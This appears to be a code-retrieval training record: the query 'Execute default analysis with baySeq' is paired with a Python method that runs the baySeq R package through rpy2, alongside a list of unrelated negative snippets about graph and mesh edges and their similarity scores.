self.elements=['graph_name','node_names','node_descriptions','current_node','state','data']\n for element in self.elements:\n self.__dict__[element]=self.options[element]\n self.edges=[]\n self.edge_matrices=[]\n self.state_matrix=np.matrix(self.state).T\n # Add the first 2 edges, required to intialize the graph properly\n self.add_edge(self.node_names[0],self.node_names[1],self.options[\"edge_1_to_2\"])\n self.add_edge(self.node_names[1],self.node_names[0],self.options[\"edge_2_to_1\"])", "def GetBoundaryEdgesPent(self):\n\n p = self.InferPolynomialDegree()\n\n # DO NOT COMPUTE IF ALREADY COMPUTED\n if isinstance(self.edges,np.ndarray):\n if self.edges.shape[0] > 1:\n # IF LINEAR VERSION IS COMPUTED, DO COMPUTE HIGHER VERSION\n if self.edges.shape[1] == 2 and p > 1:\n pass\n else:\n return\n\n node_arranger = np.array([\n [0,1],\n [1,2],\n [2,3],\n [3,4],\n [4,0],\n ])\n\n # GET ALL EDGES FROM THE ELEMENT CONNECTIVITY\n all_edges = np.concatenate((self.elements[:,node_arranger[0,:]],self.elements[:,node_arranger[1,:]],\n self.elements[:,node_arranger[2,:]],self.elements[:,node_arranger[3,:]],\n self.elements[:,node_arranger[4,:]]),axis=0).astype(np.uint64)\n\n # GET UNIQUE ROWS\n uniques, idx, inv = unique2d(all_edges,consider_sort=True,order=False,return_index=True,return_inverse=True)\n\n # ROWS THAT APPEAR ONLY ONCE CORRESPOND TO BOUNDARY EDGES\n freqs_inv = itemfreq(inv)\n edges_ext_flags = freqs_inv[freqs_inv[:,1]==1,0]\n # NOT ARRANGED\n self.edges = uniques[edges_ext_flags,:]\n\n # DETERMINE WHICH FACE OF THE ELEMENT THEY ARE\n boundary_edge_to_element = np.zeros((edges_ext_flags.shape[0],2),dtype=np.int64)\n\n # FURTHER RE-ARRANGEMENT / ARANGE THE NODES BASED ON THE ORDER THEY APPEAR\n # IN ELEMENT CONNECTIVITY\n # THIS STEP IS NOT NECESSARY INDEED - ITS JUST FOR RE-ARANGMENT OF EDGES\n all_edges_in_edges = in2d(all_edges,self.edges,consider_sort=True)\n all_edges_in_edges = np.where(all_edges_in_edges==True)[0]\n\n boundary_edge_to_element[:,0] = all_edges_in_edges % self.elements.shape[0]\n boundary_edge_to_element[:,1] = all_edges_in_edges // self.elements.shape[0]\n\n # ARRANGE FOR ANY ORDER OF BASES/ELEMENTS AND ASSIGN DATA MEMBERS\n self.edges = self.elements[boundary_edge_to_element[:,0][:,None],node_arranger[boundary_edge_to_element[:,1],:]]\n self.edges = self.edges.astype(np.uint64)\n self.boundary_edge_to_element = boundary_edge_to_element\n\n return self.edges", "def __init__(self):\n self.type = None\n self.msg = \"\"\n self.process = None\n self.edge_id = None", "def __init__(self, *args):\n _snap.TUndirNetEdgeI_swiginit(self, _snap.new_TUndirNetEdgeI(*args))", "def __init__(self, sample_size, neighbours, lengths, offsets, seed=0):\n self.sample_size = sample_size\n self.seed, self.seed2 = random_seed.get_seed(seed)\n self.neighbours = neighbours\n self.lengths = lengths\n self.offsets = offsets\n super(UniformEdgeDataset, self).__init__()", "def edge(self, viz_edge: VizEdge) -> None:\n # Take CallNode as an example, instead of \"arguments point to CallNode\",\n # we want \"CallNode points to arguments\" in ast-dump form.\n #\n # The direction of edge is typically controlled by the implemented VizParser.\n # Reverse start/end here simply because we leverage default parser implementation.\n if viz_edge.end in self._graph:\n self._graph[viz_edge.end].append(viz_edge.start)\n else:\n self._graph[viz_edge.end] = [viz_edge.start]", "def addEdge(self,x,y):\n\t\tself._matr[x][y] = True", "def __init__(self,vertices):\n self._vertices = vertices\n self._edges = []\n for i in 
range(len(self._vertices)-1)\n self._edges.append( [i,i+1] )", "def __init__(self):\n super(BaseRNNEncoder, self).__init__()", "def __init__(self, edges):\n # Standardize the bin edge arrays and assign to an attribute\n edgearrs, dims = [], []\n for e in edges:\n earr = numpy.array(e)\n edgearrs.append(earr)\n dims.append(earr.ndim)\n\n try:\n d = dims[0]\n except IndexError:\n self.edges = ()\n else:\n equal = (dim == d for dim in dims)\n if d == 0 and all(equal):\n self.edges = (numpy.array(edgearrs),)\n elif d == 1 and all(equal):\n self.edges = tuple(edgearrs)\n else:\n raise ValueError(\"'edges' must be sequence of one-dimensional \"\n \"array-like containers\")\n\n # Compute bin widths and check validity\n valid = True\n binwidths = []\n for e in self.edges:\n ds = numpy.diff(e)\n valid = valid and numpy.all(ds > 0.0)\n binwidths.append(ds)\n\n if not valid:\n raise ValueError(\"valid bin edge arrays can only contain unique, \"\n \"sorted values\")\n\n self.binwidths = tuple(binwidths)" ]
[ "0.6473663", "0.6447562", "0.6428948", "0.64194375", "0.6335059", "0.62395126", "0.6237139", "0.6191634", "0.6189968", "0.61835927", "0.6147736", "0.6143343", "0.6141972", "0.61232835", "0.6109794", "0.6109794", "0.6081987", "0.6080473", "0.6080444", "0.6078262", "0.6078262", "0.6078262", "0.60549784", "0.6031396", "0.6016448", "0.6013766", "0.6010137", "0.6004708", "0.59720343", "0.5941808", "0.5934476", "0.59192044", "0.59106", "0.5901911", "0.58983225", "0.58946854", "0.5890084", "0.5871739", "0.58590925", "0.5858806", "0.5849707", "0.58240074", "0.58122665", "0.5807478", "0.5800726", "0.57959396", "0.57804984", "0.57797575", "0.5761811", "0.57404953", "0.57092327", "0.568719", "0.56827575", "0.56816864", "0.5668918", "0.56596404", "0.56577325", "0.5652195", "0.5635891", "0.5632508", "0.5607719", "0.55947566", "0.558508", "0.5583208", "0.5571238", "0.55695695", "0.5565862", "0.5559166", "0.5542714", "0.5523978", "0.5503804", "0.55006653", "0.54975444", "0.54969573", "0.54907745", "0.5471551", "0.54692024", "0.54687786", "0.546783", "0.5462357", "0.5462357", "0.5462357", "0.54579085", "0.54524314", "0.54411364", "0.5438523", "0.54191214", "0.54141027", "0.54141027", "0.5410302", "0.5408534", "0.54048234", "0.5404339", "0.5402457", "0.5396066", "0.53845435", "0.5383158", "0.5380361", "0.53724086", "0.5369308", "0.53693056" ]
0.0
-1
Execute default analysis with baySeq
def run_bayseq(self): try: res = robjects.r('library("parallel")') res = robjects.r('library("stats4")') res = robjects.r('library("BiocGenerics")') res = robjects.r('library("S4Vectors")') res = robjects.r('library("IRanges")') res = robjects.r('library("GenomeInfoDb")') res = robjects.r('library("abind")') # res = robjects.r('library("perm")') res = robjects.r('library("GenomicRanges")') res = robjects.r('library("baySeq")') res = robjects.r('if(require("parallel")) cl <- makeCluster(4) else cl <- NUL') ct = 'table <- read.csv("' + self._table_count + '", row.names = 1, header = TRUE, stringsAsFactors = FALSE)' res = robjects.r(ct) res = robjects.r('m <- as.matrix(table)') replicates = "" assert isinstance(self._replic, int) for ind in iter(self._groups_name): aux = "'" + ind + "', " replicates = replicates + aux * self._replic replicates = replicates[:(len(replicates) - 2)] replicates = 'replicates <- c(' + replicates + ')' res = robjects.r(replicates) groups = 'groups <- list(NDE = c('+ "1," * len(self._groups_name) groups = groups[:(len(groups) - 1)] + ')' groups = groups + ', DE = c('+ '1,' * self._replic groups = groups + '2,' * self._replic groups = groups[:(len(groups) - 1)] + "))" print(groups) res = robjects.r(groups) res = robjects.r('CD <- new("countData", data = m, replicates = replicates, groups = groups)') res = robjects.r('libsizes(CD) <- getLibsizes(CD)') res = robjects.r('CD <- getPriors.NB(CD, samplesize = 1000, estimation = "QL", cl = cl, equalDispersions = TRUE)') res = robjects.r('CD <- getLikelihoods(CD, prs=c(0.5, 0.5), pET="BIC", cl=cl)') # CD.posteriors.DE < - exp(CD @ posteriors)[, 2] res = robjects.r('write.table(topCounts(CD, group = "DE", number = 65000, normaliseData = TRUE), "' + self._output +'", sep="\t", quote = FALSE)') self._message.message_9("--- baySeq is completed!") except RRuntimeError as rre: self._message.message_9("Error in baySeq execution: " + str(rre)) raise rre
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main(self):\n try:\n self.parse_args()\n self.run()\n return 0\n except AnalysisBackendError as e:\n L.error(e)\n return 1", "def run_analysis(self, argv):\n self._run_argparser(argv)\n self.run()", "def run(self) :\n# print \"evaluating with laban\"\n # currently, labanx reads from a preset file\n os.system('labanx '+str(self.rank)+\" \"+self.input+\" \"+self.output)", "def run(self) -> None:\n barcoded = BarcodedFilename.from_sample(self.analysis.sample)\n\n if barcoded.analyte == Analyte.RNASEQ:\n if self.analysis.parameters[\"rnaseq_aligner\"] == RnaSeqAligner.STAR:\n self.star()\n else:\n raise Exception(\"unexpected aligner for this type of sample\")\n else:\n if self.analysis.parameters[\"aligner\"] == GenericAligner.NOVOALIGN:\n self.novoalign()\n elif self.analysis.parameters[\"aligner\"] == GenericAligner.BWA:\n self.bwa()\n else:\n raise Exception(\"unexpected aligner for this type of sample\")", "def executeAnalysis(config, samples, visitor):\n # store cuts in \"info\" (re-created from TQCuts)\n # ROOT.xAOD.clearTransientTrees()\n #nEventsProcessed = 0\n\n CLI = config.getFolder(\"CLI+\")\n\n # flag indicating to run analysis in debug mode\n debug = CLI.getTagBoolDefault(\"debug\",False)\n # flag indicating to run a dummy analysis\n dummy = CLI.getTagBoolDefault(\"dummy\",False)\n\n downmerge = CLI.getTagBoolDefault(\"downmerge\",False)\n downmergeTo = CLI.getTagStandardStringDefault(\"downmergeTo\",\"\")\n\n pathselect = CLI.getTagVStandardString(\"pathselect\")\n\n if debug:\n maxEvents = 100\n else:\n maxEvents = config.getTagIntegerDefault(\"maxEvents\",-1)\n\n # proceed with analysis\n appname = QFramework.TQLibrary.getApplicationName().Data()\n visitor.setVisitTraceID(appname)\n if maxEvents > 0:\n QFramework.WARN(\"setting maximum number of events per sample to {:d}\".format(maxEvents))\n visitor.setMaxEvents(maxEvents)\n QFramework.TQLibrary.allowRedirection(False)\n timer = ROOT.TStopwatch()\n nsamples = 0\n if pathselect.size() > 0:\n paths = ROOT.TString(\",\".join(map(str,pathselect)))\n else:\n # Read in sample folder restrictions and convert to a single comma-\n # separated string, the same format as it would be passed in via CLI.\n # Can't use `join` since this is a vector<TString>\n # Can't read in the field as a single string with getTagString,\n # perhaps since it has commas\n paths = \"\"\n for path in config.getTagVString(\"restrict\"):\n paths += path.Data() + \",\"\n paths = ROOT.TString(paths[:-1])\n if paths.Length() != 0:\n if not dummy:\n nsamples = samples.visitSampleFolders(visitor,paths)\n QFramework.TQLibrary.recordMemory()\n QFramework.TQObservable.clearAll()\n QFramework.TQLibrary.recordMemory()\n if downmerge or downmergeTo:\n downmergeTargets = downmergeTo\n if not downmergeTargets:\n downmergeTargets = paths\n samples.setTag(\".generalize.histograms\",True,downmergeTargets)\n samples.setTag(\".generalize.cutflow\",True,downmergeTargets)\n else:\n QFramework.WARN(\"dummy run, skipping execution of cutbased analysis on paths '{:s}'\".format(pathselect))\n else:\n if not dummy:\n nsamples = samples.visitMe(visitor)\n QFramework.TQLibrary.recordMemory()\n else:\n QFramework.WARN(\"dummy run, skipping execution of cutbased analysis on root sample folder\")\n\n # TODO: put the rest of this in a separate function like for post processing?\n # right now nsamples is returned but nothing is done with it\n if nsamples > 0:\n if downmerge or downmergeTo:\n samples.generalizeObjects(\".generalize\")\n timer.Stop()\n\n # TODO: put this section in its 
own function (with cuts available)\n # just get cuts from visitor? (will need to provide a channel in the MCASV case I think)\n if config.getTagBoolDefault(\"checkRun\",True):\n\n if dummy:\n allevents = QFramework.TQCounter(\"dummy\",0,0,0)\n else:\n if isinstance(visitor,QFramework.TQAnalysisSampleVisitor):\n allevents = samples.getCounter(\".\",visitor.getBaseCut().GetName())\n elif isinstance(visitor,QFramework.TQMultiChannelAnalysisSampleVisitor):\n channels = config.getTagVString(\"channels\")\n allevents = samples.getCounter(\".\",visitor.getBaseCut(channels[0]).GetName())\n\n if nsamples > 0:\n # debugging printout\n # TODO: make separate method?\n if config.getTagBoolDefault(\"printCounterValues\",False):\n samples.printListOfCounters()\n printhists = config.getTagVString(\"printHistogramsASCII\")\n for hist in printhists:\n h = samples.getHistogram(\".\",hist)\n if h:\n QFramework.TQHistogramUtils.printHistogramASCII(h)\n else:\n QFramework.ERROR(\"unable to access histogram '{:s}'\".format(hist))\n\n else:\n QFramework.ERROR(\"execution of analysis finished but might have failed, no samples were visited successfully (they might simply be empty).\")\n runtime = config.getFolder(\"runtime+\")\n # store in runtime folder the fact that no samples were visited in the form of an error string\n analysisError = \"execution of analysis finished but might have failed, no samples were visited successfully (they might simply be empty).\"\n runtime.setTagString(\"analysisError\", analysisError)\n #don't quit just now, but instead we'll write an alternative output file later which basically states \"job didn't crash but there is a small chance something went wrong\"\n #quit()\n\n #return nEventsProcessed\n return nsamples", "def runsbeana(self):", "def run_analys(global_config, sample_config):\n # check that what I am going to run is available on the path and on the \n # global config\n common._check_pipeline(sample_config, global_config)\n pipeline = sample_config[\"pipeline\"] # pipeline/analysis to be executed\n # this stopped to --> workgetattr(__import__(command), \"run\")\n command_fn = getattr(globals()[pipeline], \"run\")\n command_fn(global_config, sample_config)", "def run_all(self):\n\n self.run_mash() ###Run MASH analysis\n self.filter_query() ###Filter fasta sequences out based on p value\n self.build_index(self.filtered_out_path) ###Build index for off-target analysis\n os.remove(self.filtered_out_path) ###Clean up intermediate fasta file\n self.format_gRNA(self.path1) ###Format everything in the right order\n self.run_OTF() ###Run off-target analysis\n self.output_parse() ###Parse output values and update table", "def single_analysis(config, name):\n # graphviz = GephiOutput()\n graphviz = GraphvizOutput()\n graphviz.output_file = name\n\n print \"Preparing test case...\"\n radio, lines = _prepare_test_case()\n\n print \"Running test case...\"\n with PyCallGraph(output=graphviz, config=config):\n _run_test_case(radio, lines)", "def test_pandaseq_assembly(self):\n\n # write temp files\n self.writeTmpFastq(self.test_fn1, self.test_fn2)\n\n ### Run with recomended default function params ##\n params = {}\n params['-f'] = self.test_fn1\n params['-r'] = self.test_fn2\n \n pandaseq_app = PandaSeq(params=params,\n WorkingDir=self.temp_dir_string)\n\n pandaseq_app.Parameters['-F'].on()\n\n res = pandaseq_app([self.test_fn1, self.test_fn2])\n\n # assembly is sent to StdOut, check output\n self.assertEqual(res['StdOut'].read(), expected_default_assembly)\n \n res.cleanUp()\n\n ### Run 
with altered params ###\n # run with out -F option (output is FASTA format)\n params2 = {}\n params2['-f'] = self.test_fn1\n params2['-r'] = self.test_fn2\n \n pandaseq_app2 = PandaSeq(params=params2,\n WorkingDir=self.temp_dir_string)\n \n res2 = pandaseq_app2([self.test_fn1, self.test_fn2])\n\n # assembly is sent to StdOut, check output\n self.assertEqual(res2['StdOut'].read(), expected_default_assembly_fasta)\n \n res2.cleanUp()\n shutil.rmtree(self.temp_dir_string)", "def main():\n subcommands = {\n \"train\": train.train,\n \"tune\": train_tune.train,\n \"predict\": predict.cli_predict,\n \"evaluate\": evaluate.cli_evaluate,\n \"version\": version,\n }\n\n try:\n import xarray_behave.gui.app\n\n subcommands[\"gui\"] = xarray_behave.gui.app.main_das\n except (ImportError, ModuleNotFoundError):\n logging.exception(\"No GUI avalaible.\")\n # fall back to function that displays helpful instructions\n subcommands[\"gui\"] = no_xb_gui\n\n logging.basicConfig(level=logging.INFO, force=True)\n defopt.run(subcommands, show_defaults=False)", "def bct_analysis():\n # Detect the number of active documents.\n num_active_docs = detect_active_docs()\n # Get labels with their ids.\n id_label_map = \\\n FileManagerModel().load_file_manager().get_active_labels_with_id()\n\n # Fill in default options.\n if 'analyoption' not in session:\n session['analyoption'] = constants.DEFAULT_ANALYZE_OPTIONS\n if 'bctoption' not in session:\n session['bctoption'] = constants.DEFAULT_BCT_OPTIONS\n\n try:\n from lexos.models.bct_model import BCTModel\n # Use a black hole variable to hold the model to get rid of warning.\n _ = BCTModel()\n # Render the HTML template.\n return render_template(\n 'bct_analysis.html',\n itm=\"bct-analysis\",\n labels=id_label_map,\n numActiveDocs=num_active_docs\n )\n except ImportError:\n return render_template(\n 'bct_analysis_import_error.html',\n itm=\"bct-analysis\"\n )", "def run(bmark):\r\n raise Exception(\"Not implemented\")", "def call(args) :\n from caller import bam_call\n bam_call(args)", "def run_analysis(self, query, key=None):\n logger.info(\"Running analysis on query...\")\n core_annotation = Annotation(query, key)\n clf_pipeline = AnalysisPipeline()\n entity_pipeline = AnalysisPipeline()\n clf = self.clf_accessor.get_classification_pipeline('multiclass', 'intent_classifier')\n\n \"\"\" Create the IntentClassificationAnnotator using the pipeline 'clf' \"\"\"\n clf_annotator = IntentClassificationAnnotator('clf', clf)\n clf_pipeline.add_annotator(clf_annotator)\n \"\"\" Run clf_pipeline to obtain intent classification \"\"\"\n core_annotation = clf_pipeline.analyze(core_annotation)\n \"\"\" Ensure classification results exists, otherwise raise AnalyzerError \"\"\"\n if core_annotation.annotations['results']['classification'] is []:\n raise AnalyzerError(\"No intent classification results.\")\n \"\"\" Create annotators based on entity types of intent classification \"\"\"\n entities = core_annotation.annotations['entity_types']\n\n \"\"\" Obtain gazetteers associated with the given key \"\"\"\n gazetteers = self.gaz_accessor.get_gazeteers(key)\n\n logger.debug(\"Core annotation intents: {0}\".format(core_annotation.annotations['results']['classification']))\n logger.debug(\"Core annotation entities: {0}\".format(core_annotation.annotations['entity_types']))\n logger.debug(\"Core annotation stopwords: {0}\".format(core_annotation.annotations['stopwords']))\n\n \"\"\" Iterate over entities and create an the appropriate Annotator based on the entity_type \"\"\"\n for entity in 
entities:\n \"\"\" Access the binary classifier for the appropriate entity types and create BinaryClassifierAnnotator\"\"\"\n if entity['entity_type'] == 'binary_classifier':\n logger.debug(\"Creating BinaryClassificationAnnotator for: {0}\".format(entity['entity_name']))\n clf = self.clf_accessor.get_classification_pipeline('binary_classifier', entity['entity_name'])\n binary_clf_annotator = BinaryClassificationAnnotator(entity['entity_name'], clf)\n entity_pipeline.add_annotator(binary_clf_annotator)\n\n \"\"\" Create a RegexAnnotator for each regex entity type\"\"\"\n if entity['entity_type'] == 'regex':\n logger.debug(\"Creating RegexAnnotator for: {0}\".format(entity['entity_name']))\n regex_annotator = RegexAnnotator(entity['entity_name'], Regexer(entity['regular_expressions']))\n entity_pipeline.add_annotator(regex_annotator)\n\n \"\"\" Create a BinaryRegexAnnotator for each regex entity type\"\"\"\n if entity['entity_type'] == 'binary_regex':\n logger.debug(\"Creating BinaryRegexAnnotator for: {0}\".format(entity['entity_name']))\n regex_annotator = BinaryRegexAnnotator(entity['entity_name'], Regexer(entity['regular_expressions']))\n entity_pipeline.add_annotator(regex_annotator)\n\n \"\"\" Create a NaiveNumberAnnotator for each number entity type\"\"\"\n if entity['entity_type'] == 'number':\n logger.debug(\"Creating NaiveNumberAnnotator for: {0}\".format(entity['entity_name']))\n number_annotator = NaiveNumberAnnotator(entity['entity_name'], NumberExtractor())\n entity_pipeline.add_annotator(number_annotator)\n\n \"\"\" Create a FuzzyMatchAnnotator for each fuzzy_match entity type\"\"\"\n if entity['entity_type'] == 'fuzzy_match':\n logger.debug(\"Creating FuzzyFindAnnotator for: {0}\".format(entity['entity_name']))\n logger.debug(\"Entity Keywords: {}\".format(entity['keywords']))\n fuzzy_matcher_annotator = FuzzyMatcherAnnotator(entity['entity_name'], FuzzyMatcher(), entity['keywords'])\n entity_pipeline.add_annotator(fuzzy_matcher_annotator)\n\n \"\"\" Create a DatetimeAnnotator for each number entity type\"\"\"\n if entity['entity_type'] == 'datetime':\n logger.debug(\"Creating DatetimeAnnotator for: {0}\".format(entity['entity_name']))\n duckling_instance = self.duckling_factory.getDucklingInstance()\n parser = DucklingDatetimeParser(duckling_instance)\n datetime_annotator = DatetimeAnnotator(entity['entity_name'], parser)\n entity_pipeline.add_annotator(datetime_annotator)\n\n \"\"\" Access the gazetteer for the appropriate entity types and create an GazetteerAnnotator \"\"\"\n if entity['entity_type'] == 'gazetteer' or entity['entity_type'] == 'simple_gazetteer':\n if gazetteers is not None:\n logger.debug(\"Creating GazetteerAnnotator for: {0}\".format(entity['entity_name']))\n \"\"\" Check to make sure gazetteers contains the gazetteer type to avoid key error \"\"\"\n if entity['entity_name'] in gazetteers.keys():\n gaz_annotator = GazetteerAnnotator(entity['entity_name'], gazetteers[entity['entity_name']])\n entity_pipeline.add_annotator(gaz_annotator)\n\n core_annotation = entity_pipeline.analyze(core_annotation)\n return core_annotation.annotations['results']", "def run(self, verbose=0):\n self.verbose = verbose\n self._preproc()\n self._lda()\n self._evaluate()", "def main():\n args = parse_args(sys.argv[1:])\n\n if args.version:\n print(birdvoxclassify.version.version)\n return\n\n if args.quiet:\n logger_level = 30\n elif args.verbose:\n logger_level = 20\n else:\n logger_level = 25\n\n run(args.inputs,\n output_dir=args.output_dir,\n 
output_summary_path=args.output_summary_path,\n model_name=args.model_name,\n batch_size=args.batch_size,\n select_best_candidates=args.select_best_candidates,\n hierarchical_consistency=args.hierarchical_consistency,\n suffix=args.suffix,\n logger_level=logger_level)", "def run_analysis(wf):\n if wf.analysis[\"type\"] == \"one_sample_tests\":\n start_one_sample_tests(wf)\n\n elif wf.analysis[\"type\"] == \"two_sample_tests\":\n start_two_sample_tests(wf)\n\n elif wf.analysis[\"type\"] == \"factorial_tests\":\n start_factorial_tests(wf)\n\n elif wf.analysis[\"type\"] == \"n_sample_tests\":\n start_n_sample_tests(wf)\n\n info(\"> Finished analysis\")", "def main():\n\t#ps = PackageScanner()\n\t#packages = ps.getInstalledPackages()\n\t#print(packages)\n\t#ps.saveScanResults()\n\n\tan = Analyzer()\n\tan.loadFromFile(config.PKG_SCAN_DIR / config.PKG_SCAN_FILE)\n\t#an.loadFromPackageCont(packages)\n\tan.analyze()\n\tan.saveAnalysisResults()", "def run():\n import hmmmAssembler ; reload(hmmmAssembler) # import helpers\n hmmmAssembler.main(Random) # this runs the code!", "def run(self,infilename): \n ### initizlize the analysis\n self.init_analysis(infilename)\n ### run the analysis\n self.run_analysis()\n ### store selected results\n self.store_results()\n return", "def run(self, fileStore):\n work_dir = fileStore.getLocalTempDir()\n fastaFile = os.path.join(work_dir, 'seq.fa')\n fileStore.readGlobalFile(self.fastaID, fastaFile)\n\n # download the model\n modelFile = os.path.join(work_dir, 'model.knm')\n assert os.environ.get(\"CACTUS_DNA_BRNN_MODEL_ID\") is not None \n modelID = os.environ.get(\"CACTUS_DNA_BRNN_MODEL_ID\")\n fileStore.readGlobalFile(modelID, modelFile)\n\n # ignore existing model flag\n if '-i' in self.dnabrnnOpts:\n i = self.dnabrnnOpts.index('-i')\n del self.dnabrnnOpts[i]\n del self.dnabrnnOpts[i]\n\n cmd = ['dna-brnn', fastaFile] + self.dnabrnnOpts.split() + ['-i', modelFile]\n \n if self.cores:\n cmd += ['-t', str(self.cores)]\n\n bedFile = os.path.join(work_dir, 'regions.bed')\n\n # run dna-brnn to make a bed file\n cactus_call(outfile=bedFile, parameters=cmd)\n\n if self.mergeLength is None:\n self.mergeLength = 0\n if self.minLength is None:\n self.minLength = 0\n \n # merge up the intervals into a new bed file\n mergedBedFile = os.path.join(work_dir, 'filtered.bed')\n merge_cmd = []\n merge_cmd.append(['awk', '{{if($3-$2 > {}) print}}'.format(self.minLength), bedFile])\n merge_cmd.append(['bedtools', 'sort', '-i', '-'])\n merge_cmd.append(['bedtools', 'merge', '-i', '-', '-d', str(self.mergeLength)]) \n cactus_call(outfile=mergedBedFile, parameters=merge_cmd)\n\n maskedFile = os.path.join(work_dir, 'masked.fa')\n \n if self.action in ('softmask', 'hardmask'):\n mask_cmd = ['cactus_fasta_softmask_intervals.py', '--origin=zero', bedFile]\n if self.minLength:\n mask_cmd += ['--minLength={}'.format(self.minLength)]\n if self.action == 'hardmask':\n mask_cmd += ['--mask=N']\n # do the softmasking\n cactus_call(infile=fastaFile, outfile=maskedFile, parameters=mask_cmd)\n else:\n assert self.action == \"clip\"\n # to clip, we need a bed of the regions we want to *keep*. 
We'll start with the whole thing\n allRegionsFile = os.path.join(work_dir, 'chroms.bed')\n cactus_call(parameters=['samtools', 'faidx', fastaFile])\n cactus_call(outfile=allRegionsFile, parameters=['awk', '{print $1 \"\\\\t0\\\\t\" $2}', fastaFile + '.fai'])\n # load the contig lengths\n contig_lengths = {}\n with open(fastaFile + '.fai', 'r') as fai:\n for line in fai:\n toks = line.strip().split('\\t')\n contig_lengths[toks[0]] = int(toks[1])\n # now we cut out the regions\n clippedRegionsFile = os.path.join(work_dir, 'clipped.bed')\n cactus_call(outfile=clippedRegionsFile, parameters=['bedtools', 'subtract', '-a', allRegionsFile, '-b', mergedBedFile])\n # now we make a fiadx input regions\n faidxRegionsFile = os.path.join(work_dir, 'faidx_regions.txt')\n with open(clippedRegionsFile, 'r') as clipFile, open(mergedBedFile, 'a') as mergeFile, open(faidxRegionsFile, 'w') as listFile:\n for line in clipFile:\n toks = line.strip().split(\"\\t\")\n if len(toks) > 2:\n seq, start, end = toks[0], int(toks[1]), int(toks[2])\n if end - start > self.minLength or contig_lengths[seq] <= self.minLength:\n region = seq\n if end - start < contig_lengths[seq]:\n # go from 0-based end exlusive to 1-based end inclusive when\n # converting from BED to samtools region\n region += ':{}-{}'.format(start + 1, end)\n else:\n assert start == 0 and end == contig_lengths[seq]\n listFile.write('{}\\n'.format(region))\n else:\n # the region was too small, we remember it in our filtered bed file\n mergeFile.write(line)\n # and cut the fasta apart with samtools\n cactus_call(outfile=maskedFile, parameters=['samtools', 'faidx', fastaFile, '-r', faidxRegionsFile])\n \n return fileStore.writeGlobalFile(maskedFile), fileStore.writeGlobalFile(bedFile), fileStore.writeGlobalFile(mergedBedFile)", "def bwa(self) -> None:\n self.analysis.logger.info(\"Running alignment with BWA\")\n self.chdir()\n config = self.analysis.config\n executor = Executor(self.analysis)\n executor(\n f\"{config.bwa} mem -t 6 -L 5,10 -v 1 {{genome_ref}} \"\n f\"{{input_filename}}> {{output_filename}}\",\n input_function=lambda l: \" \".join(sorted(l)),\n input_split_reads=False,\n output_format=f\"{self.analysis.basename}{{organism_str}}.sam\",\n split_by_organism=True,\n only_human=self.only_human,\n unlink_inputs=True,\n )\n self.analysis.logger.info(\"Alignment finished. Aligner used: BWA\")", "def _cmd_bintest(args):\n cnarr = read_cna(args.cnarray)\n segments = read_cna(args.segment) if args.segment else None\n sig = do_bintest(cnarr, segments, args.alpha, args.target)\n tabio.write(sig, args.output or sys.stdout)", "def RUN(self):", "def run(config=None):\n AlignmentWorkflow().run(config)", "def __call__(self, seq_path, result_path=None, log_path=None):\r\n raise NotImplementedError(\"Aligner is an abstract class\")", "def skesa_assemble(self):\n with progressbar(self.metadata) as bar:\n for sample in bar:\n # Initialise the assembly command\n sample.commands.assemble = str()\n try:\n if sample.general.trimmedcorrectedfastqfiles:\n # If the sample is a pure isolate, assemble it. 
Otherwise, run the pre-metagenome pipeline\n try:\n status = sample.run.Description\n except AttributeError:\n status = 'unknown'\n if status == 'metagenome':\n self.merge(sample)\n else:\n # Set the output directory\n sample.general.assembly_output = os.path.join(sample.general.outputdirectory,\n 'assembly_output')\n make_path(sample.general.assembly_output)\n sample.general.assemblyfile = os.path.join(sample.general.assembly_output,\n '{name}_unfiltered.fasta'\n .format(name=sample.name))\n sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output,\n '{name}.fasta'\n .format(name=sample.name))\n fastqfiles = sample.general.trimmedcorrectedfastqfiles\n\n # Set the the forward fastq files\n sample.general.assemblyfastq = fastqfiles\n forward = fastqfiles[0]\n gz = True if '.gz' in forward else False\n # If there are two fastq files\n if len(fastqfiles) == 2:\n # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7\n sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\\n '--use_paired_ends --vector_percent 1 ' \\\n '--contigs_out {contigs}'\\\n .format(fastqfiles=','.join(fastqfiles),\n threads=self.cpus,\n contigs=sample.general.assemblyfile)\n # Same as above, but use single read settings for the assembler\n else:\n sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\\n '--vector_percent 1 --contigs_out {contigs}'\\\n .format(fastqfiles=','.join(fastqfiles),\n threads=self.cpus,\n contigs=sample.general.assemblyfile)\n # Specify that the files are gzipped\n if gz:\n sample.commands.assemble += ' --gz'\n # If there are no fastq files, populate the metadata appropriately\n else:\n sample.general.assembly_output = 'NA'\n sample.general.assemblyfastq = 'NA'\n sample.general.bestassemblyfile = 'NA'\n except AttributeError:\n sample.general.assembly_output = 'NA'\n sample.general.assemblyfastq = 'NA'\n sample.general.trimmedcorrectedfastqfiles = 'NA'\n sample.general.bestassemblyfile = 'NA'\n if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile):\n # Run the assembly\n out, err = run_subprocess(sample.commands.assemble)\n write_to_logfile(sample.commands.assemble,\n sample.commands.assemble,\n self.logfile,\n sample.general.logout,\n sample.general.logerr,\n None,\n None)\n write_to_logfile(out,\n err,\n self.logfile,\n sample.general.logout,\n sample.general.logerr,\n None,\n None)", "def main():\n # Define Parser object and add to Toil\n parser = argparse.ArgumentParser(description=main.__doc__, formatter_class=argparse.RawTextHelpFormatter)\n subparsers = parser.add_subparsers(dest='command')\n # Generate subparsers\n subparsers.add_parser('generate-config', help='Generates an editable config in the current working directory.')\n subparsers.add_parser('generate-manifest', help='Generates an editable manifest in the current working directory.')\n subparsers.add_parser('generate', help='Generates a config and manifest in the current working directory.')\n # Run subparser\n parser_run = subparsers.add_parser('run', help='Runs the BWA alignment pipeline')\n group = parser_run.add_mutually_exclusive_group()\n parser_run.add_argument('--config', default='config-toil-bwa.yaml', type=str,\n help='Path to the (filled in) config file, generated with \"generate-config\".')\n group.add_argument('--manifest', default='manifest-toil-bwa.tsv', type=str,\n help='Path to the (filled in) manifest file, generated with \"generate-manifest\". 
